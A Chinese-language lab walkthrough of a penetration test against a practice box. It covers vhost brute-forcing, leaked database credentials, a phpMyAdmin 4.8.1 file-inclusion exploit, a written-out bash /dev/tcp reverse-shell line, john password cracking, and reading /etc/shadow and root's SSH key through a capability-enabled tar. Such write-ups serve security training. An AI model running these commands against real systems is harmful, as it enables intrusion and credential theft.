本文详细描述了一次渗透测试的过程,包括端口扫描、子域名爆破、发现数据库凭证、利用PHPMyAdmin登录、执行RCE脚本、文件包含漏洞利用、获取管理员权限、尝试提权、读取SSH密钥并最终获得root权限。过程中涉及的技术包括Web安全、数据库管理、Linux提权等。
1.常规端口及服务发现
2.发现web页面存在子域名,绑定域名,用dirsearch进行子域名爆破,
访问到config.php.bak的页面源码的数据库账号与密码,ssh爆破失败
3.尝试进行子域名爆破,使用gobuster进行爆破
gobuster vhost -u http://votenow.local/ -w /usr/share/seclists/Discovery/Web-Con
tent/directory-list-2.3-medium.txt | grep “Status:200”
发现到新域名datasafe.votenow.loacl访问得到PHPmyadmin页面,使用账号密码登录成功
4.在user表中得到账号密码,查看/README版本信息,为4.8.1,使用searcchsploit搜索4.8.1,
发现存在与一个rce,使用该脚本攻击目标域名,但是发现无法正常使用
5.使用刚才搜索到的文件包含漏洞,执行语句后,将获得的session值填入,发现phpinfo执行
成功,将phpinfo的内容替换为nc的反弹shell的代码
sysytem(“bash -i >& /dev/tcp/10.1.8.137/4444 0>&1”)
执行sql语句,开启本机侦听端口,反弹shell成功突破外围
6.开始进行提权
查看内核版本为3.10.0,使用脏牛漏洞尝试进行提权均失败
查看到passwd目录下存在admin的账号
将表里的hash值保存下来,使用john进行hash密码爆破
john --wordlist=rockyou.txt hash 得到密码为Stella
su到admin输入密码成功切换到admin账户,升级shell
7.尝试使用capblity进行提权,一旦系统中具有capblit则不受文件访问的权限
getcap -r / 2>/dev/null
挨个查看文件,发现/usr/bin/tarS这个文件是属于admin的
tarS -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
chmod 700 shadow
打开查看到root账号的密码为密文,对该密码进行爆破失败
思考到去读取root账号的公私钥
tarS -cvf k.tar /root/.ssh/id_rsa
tar -xvf k.tar
ssh -i id_rsa root@localhost -p 2082
8.成功得到root权限,打靶完成
扫一扫
1094
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
